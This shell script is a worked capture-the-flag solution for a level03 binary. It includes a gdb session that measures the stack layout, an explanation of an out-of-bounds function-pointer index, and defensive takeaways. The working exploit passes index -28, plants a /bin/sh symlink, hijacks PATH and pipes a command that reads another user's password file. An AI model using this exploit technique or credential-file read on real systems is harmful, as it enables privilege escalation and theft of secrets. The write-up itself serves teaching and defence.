#!/bin/sh
#
# Worked solution for the level03 CTF exercise, kept as a case study of an
# out-of-bounds function-pointer lookup.
#
# Debugger session used to measure the stack layout:
#
#   level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03
#   (gdb) break truncate_and_call
#   Breakpoint 1 at 0x8048780: file level03.c, line 57.
#   (gdb) run 1 something
#   Starting program: /levels/level03 1 something
#
#   Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57
#   57 in level03.c
#   (gdb) n
#   60 in level03.c
#   (gdb) p &buf
#   $1 = (char (*)[64]) 0xffeecf7c
#   (gdb) p fns
#   $2 = (fn_ptr *) 0xffeecfec
#   (gdb) p (0xffeecfec-0xffeecf7c)/4
#   $3 = 28
#   (gdb) p run
#   $4 = {int (const char *)} 0x804875b
#   (gdb) quit
#
# What the session establishes:
#   * buf (64 bytes) sits 28 four-byte slots below fns, so fns[-28] reads
#     the first four bytes of buf.
#   * run() is located at 0x804875b.
#
# Root cause, as far as this page shows: the index argument is used to pick
# an entry from fns and a negative value is evidently not rejected, so the
# "function pointer" can be fetched from caller-supplied data in buf.
# NOTE(review): level03.c is not shown here; presumably user_string is
# copied into buf and run() hands its argument to a PATH-based command
# lookup -- confirm against the source.
#
# Defensive takeaways:
#   * Range-check a table index on both ends (or parse it as unsigned)
#     before dereferencing a function-pointer table.
#   * A privileged helper should not resolve commands through a PATH the
#     caller controls; use absolute paths and a sanitised environment.

# Little-endian bytes of run()'s address (0x804875b). The same string is
# used both as the program argument and as a file name in the current dir.
run_addr_bytes="$(printf '\x5b\x87\x04\x08')"

# Give that byte string a meaning as a command name: a symlink to /bin/sh.
ln -s /bin/sh "$run_addr_bytes"

# Index -28 selects the slot overlapping buf; "." is prepended to PATH so
# the symlink above is found first. The command to run arrives on stdin.
echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$run_addr_bytes"

# Remove the symlink again.
rm "$run_addr_bytes"